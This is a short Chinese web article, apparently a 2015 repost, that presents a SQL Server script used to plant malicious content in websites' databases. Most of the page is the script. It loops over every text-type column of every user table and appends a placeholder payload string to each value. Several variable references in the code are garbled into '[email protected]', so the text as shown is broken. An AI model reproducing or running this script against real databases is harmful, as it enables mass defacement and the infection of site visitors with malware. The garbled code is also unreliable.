最近比较流行的数据库挂马

当前位置 : 首页 > 实用技巧 > 漏洞研究 > 最近比较流行的数据库挂马

最近比较流行的数据库挂马

来源:互联网 作者:脚本宝典 时间:2015-07-26 18:38
SQL语句如下:用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)xtype=99ntextxtype=35textxtype=231nvarcharxtype=167varchar———————YD的分割—————
SQL语句如下: 

用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段) 

xtype=99 ntext 
xtype=35 text 
xtype=231 nvarchar 
xtype=167 varchar 
———————YD的分割——————————– 

DECLARE @T varchar(255), 
@C varchar(255) 
DECLARE Table_Cursor CURSOR FOR 
Select 
a.name,b.name 
from sysobjects a, 
syscolumns b 
where a.id=b.id and 
a.xtype='u' and 
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
BEGIN 
exec('update ['[email protected]+'] set ['[email protected]+']= 
rtrim(convert(varchar,['[email protected]+']))+ 
”挂马内容”') 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
END 
CLOSE Table_Cursor 
DEALLOCATE Table_Cursor


Tag:
网友评论

<